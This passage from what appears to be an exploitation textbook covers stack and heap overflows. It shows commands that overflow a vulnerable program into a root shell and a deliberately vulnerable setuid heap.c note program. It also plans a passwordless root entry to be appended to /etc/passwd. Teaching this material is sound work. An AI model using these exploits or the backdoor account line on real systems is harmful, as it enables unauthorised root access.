SHELLCODE is located at 0xbffffcfc $ cp bb ccc $./ccc SHELLCODE SHELLCODE is located at 0xbffffcfa As the preceding experiment shows, the length of the name of the executing program has an effect on location of exported environment variables. The general trend seems to be a decrease of 2 bytes in the address of the environment variable for every single byte increase in the length of the program name. This continues to hold true with the program name getenvaddr, because the difference in length between the names getenvaddr and a is 9 bytes, and the difference between the address 0xbffffcfe and 0xbffffcec is 18 bytes. Armed with this knowledge, the exact address of the environment variable can be predicted when the vulnerable program is executed. This means the crutch of a NOP sled can be eliminated. $ export SHELLCODE='cat shellcode' $./getenvaddr SHELLCODE SHELLCODE is located at 0xbffffd50 $ Because the name of the vulnerable program is vuln2, which is 5 bytes long, and the name of the helper program is getenvaddr, which is 10 bytes long, the address of the shellcode will be ten bytes more when the vulnerable program is executed. This is because the helper program's name is 5 bytes more than the vulnerable program's name. Some basic math reveals that the predicted shellcode address when the vulnerable program is executed should be 0xbffffd5a. $./vuln2 'perl -e 'print "\x5a\xfd\xff\xbf"x8;'' sh-2.05a# whoami root sh-2.05a# This type of surgical precision is definitely good practice, but it isn't always necessary. The knowledge gained from this experimentation can help calculate how long the NOP sled should be, though. As long as the helper program's name is longer than the name of the vulnerable program, the address returned by the helper program will always be greater than what the address will be when the vulnerable program is executed. This means a small NOP sled before the shellcode in the environment variable will neatly compensate for this difference. The size of the necessary NOP sled can be easily calculated. Because a vulnerable program name needs at least one character, the maximum difference in the program name lengths will be the length of the helper program's name minus one. In this case, the helper program's name is getenvaddr, which means the NOP sled should be 18 bytes long, because the address is adjusted by 2 bytes for every single byte in difference. (10 ? 1) · 2 = 18. 0x280 Heap-and bss-Based Overflows In addition to stack-based overflows, there are buffer-overflow vulnerabilities that can occur in the heap and bss memory segments. While these types of overflows aren't as standardized as stack-based overflows, they can be just as effective. Because there's no return address to overwrite, these types of overflows depend on important variables being stored in memory after a buffer that can be overflowed. If an important variable, such as one that keeps track of user permissions or authentication state, is stored after an overflowable buffer, this variable can be overwritten to give full permissions or to set authentication. Or if a function pointer is stored after an overflowable buffer, it can be overwritten, causing the program to call a different memory address (where shellcode would be) when the function pointer is eventually called. Because overflow exploits in the heap and bss memory segments are much more dependent on the layout of memory in the program, these types of vulnerabilities can be harder to spot. 0x281 A Basic Heap-Based Overflow The following program is a simple note-taking program, which is vulnerable to a heap-based overflow. It's a fairly contrived example, but that's why it's an example and not a real program. Debugging information has also been added. heap.c code #include #include int main(int argc, char *argv[]) { FILE *fd; // Allocating memory on the heap char *userinput = malloc(20); char *outputfile = malloc(20); if(argc < 2) { printf("Usage: %s \n", argv); exit(0); } // Copy data into heap memory strcpy(outputfile, "/tmp/notes"); strcpy(userinput, argv); // Print out some debug messages printf("---DEBUG--\n"); printf("[*] userinput @ %p: %s\n", userinput, userinput); printf("[*] outputfile @ %p: %s\n", outputfile, outputfile); printf("[*] distance between: %d\n", outputfile - userinput); printf("----------\n\n"); // Writing the data out to the file. printf("Writing to \"%s\" to the end of %s...\n", userinput, outputfile); fd = fopen(outputfile, "a"); if (fd == NULL) { fprintf(stderr, "error opening %s\n", outputfile); exit(1); } fprintf(fd, "%s\n", userinput); fclose(fd); return 0; } In the following output, the program is compiled, set suid root, and executed to demonstrate its functionality. $ gcc -o heap heap.c $ sudo chown root.root heap $ sudo chmod u+s heap $ $./heap testing ---DEBUG-- [*] userinput @ 0x80498d0: testing [*] outputfile @ 0x80498e8: /tmp/notes [*] distance between: 24 ---------- Writing to "testing" to the end of /tmp/notes... $ cat /tmp/notes testing $./heap more_stuff ---DEBUG-- [*] userinput @ 0x80498d0: more_stuff [*] outputfile @ 0x80498e8: /tmp/notes [*] distance between: 24 ---------- Writing to "more_stuff" to the end of /tmp/notes... $ cat /tmp/notes testing more_stuff $ This is a relatively simple program that takes a single argument and appends that string to the file /tmp/notes. One important detail that should be noticed is that the memory for the userinput variable is allocated on the heap before the memory for the outputfile variable. The debugging output from the program helps to make this clear — userinput is located at 0x80498d0, and outputfile is located at 0x80498e8. The distance between these two addresses is 24 bytes. Because the first buffer is null terminated, the maximum amount of data that can be put into this buffer without overflowing into the next should be 23 bytes. This can be quickly tested by trying to use 23- and 24-byte arguments. $./heap 12345678901234567890123 ---DEBUG-- [*] userinput @ 0x80498d0: 12345678901234567890123 [*] outputfile @ 0x80498e8: /tmp/notes [*] distance between: 24 ---------- Writing to "12345678901234567890123" to the end of /tmp/notes... $ cat /tmp/notes testing more_stuff 12345678901234567890123 $./heap 123456789012345678901234 ---DEBUG-- [*] userinput @ 0x80498d0: 123456789012345678901234 [*] outputfile @ 0x80498e8: [*] distance between: 24 ---------- Writing to "123456789012345678901234" to the end of... error opening h $ cat /tmp/notes testing more_stuff 12345678901234567890123 $ As predicted, 23 bytes fit into the userinput buffer without any problem, but when 24 bytes are tried, the null-termination byte overflows into the beginning of the outputfile buffer. This causes the outputfile to be nothing but a single null byte, which obviously cannot be opened as a file. But what if something besides a null byte were overflowed into the outputfile buffer? $./heap 123456789012345678901234testfile ---DEBUG-- [*] userinput @ 0x80498d0: 123456789012345678901234testfile [*] outputfile @ 0x80498e8: testfile [*] distance between: 24 ---------- Writing to "123456789012345678901234testfile" to the end of testfile... $ cat testfile 123456789012345678901234testfile $ This time the string testfile was overflowed into the outputfile buffer. This causes the program to write to testfile instead of /tmp/notes, as it was originally programmed to do. A string is read until a null byte is encountered, so the entire string is written to the file as the userinput. Because this is a suid program that appends data to a filename that can be controlled, data can be appended to any file. This data does have some restrictions, though; it must end with the controlled filename. There are probably several clever ways to exploit this type of capability. The most apparent one would be to append something to the /etc/passwd file. This file contains all of the usernames, IDs, and login shells for all the users of the system. Naturally, this is a critical system file, so it is a good idea to make a backup copy before messing with it too much. $ cp /etc/passwd /tmp/passwd.backup $ cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/false daemon:x:2:2:daemon:/sbin:/bin/false adm:x:3:4:adm:/var/adm:/bin/false sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt man:x:13:15:man:/usr/man:/bin/false nobody:x:65534:65534:nobody:/:/bin/false matrix:x:1000:100::/home/matrix: sshd:x:22:22:sshd:/var/empty:/dev/null $ The fields in the /etc/passwd file are delimited by colons, the first field being for login name, then password, user ID, group ID, username, home directory, and finally the login shell. The password fields are all filled with the x character, because the encrypted passwords are stored elsewhere in a shadow file. However, if this field is left blank, no password will be required. In addition, any entry in the password file that has a user ID of 0 will be given root privileges. That means the goal is to append an extra entry to the password file that has root privileges but that doesn't ask for a password. The line to append should look something like this: myroot::0:0:me:/root:/bin/bash However, the nature of this particular heap overflow exploit won't allow that exact line to be written to /etc/passwd because the string must end with /etc/passwd. However, if that filename is merely appended to the end of the entry, the passwd file entry would be incorrect. This can be compensated for with th